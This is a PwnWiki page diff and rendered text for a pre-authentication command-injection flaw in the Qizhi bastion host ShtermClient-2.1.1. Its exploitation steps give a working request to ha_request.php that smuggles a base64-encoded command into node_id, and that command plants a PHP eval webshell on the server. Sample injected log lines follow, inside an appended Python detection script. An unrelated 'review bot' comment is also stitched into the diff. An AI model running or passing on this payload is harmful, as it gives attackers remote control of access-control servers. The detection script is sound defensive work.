Difference between revisions of "齊治堡壘機前台遠程命令執行漏洞" (Qizhi bastion host pre-authentication remote command execution vulnerability)
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> ShtermClient-2.1.1 </pre> <translate> ==漏洞利用== </translate> <translate> ==漏洞利用== </translate...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 9: | Line 9: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:3--> |
</translate> | </translate> | ||
1.訪問 <code>http://10.20.10.11/listener/cluster\_manage.php</code> 返回OK; | 1.訪問 <code>http://10.20.10.11/listener/cluster\_manage.php</code> 返回OK; | ||
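Review bot: the two consecutive ==漏洞利用== headings in this hunk are each given their own translation unit (T:2 and T:3) instead of the duplicate being removed; drop the second heading and its translate block so translators see the heading once. The step text on the trailing context line sits after the closing translate tag, so it is not offered for translation, and its URL carries a stray backslash in cluster\_manage.php.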
Latest revision as of 09:31, 10 April 2021
Affected versions
ShtermClient-2.1.1
Exploitation
1. Visit http://10.20.10.11/listener/cluster_manage.php; it returns OK.
2. Visit the following link to generate a one-line webshell:
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUW3NoZWxsXSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9zaGVsbC5waHA="|base64${IFS}-d|bash`|${IFS}|echo${IFS}
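
To find requests of this shape in web access logs, the following added example (not part of the original page or of the product) flags `ha_request.php` requests whose `node_id` or `ipaddr` fails a strict allow-list check. The combined log format, the allow-list rules and the sample entries are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def bad_params(target):
    """Names of ha_request.php parameters that fail strict allow-list checks."""
    url = urlsplit(target)
    if not url.path.endswith("/ha_request.php"):
        return []
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    bad = []
    # Assumption: a legitimate node_id is a short integer, ipaddr an IP literal.
    if any(not re.fullmatch(r"[0-9]{1,6}", v) for v in query.get("node_id", [])):
        bad.append("node_id")
    if any(not is_ip(v) for v in query.get("ipaddr", [])):
        bad.append("ipaddr")
    return bad

def scan(lines):
    """Return (line_number, bad_parameter_names) for entries to investigate."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and (bad := bad_params(match.group(1))):
            hits.append((number, bad))
    return hits

# Constructed sample entries (not real traffic); addresses reuse the page's lab range.
PREFIX = '10.20.10.50 - - [10/Apr/2021:09:00:00 +0000] '
SAMPLE_LOG = [
    PREFIX + '"GET /ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1 HTTP/1.1" 200 2',
    PREFIX + '"GET /ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`id`| HTTP/1.1" 200 2',
    PREFIX + '"GET /ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1%24%7BIFS%7D%7C%60id%60 HTTP/1.1" 200 2',
    PREFIX + '"GET /index.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious {', '.join(bad)}")
```

The same allow-list check, applied server-side before the parameters reach any shell command, is the corresponding input-validation mitigation.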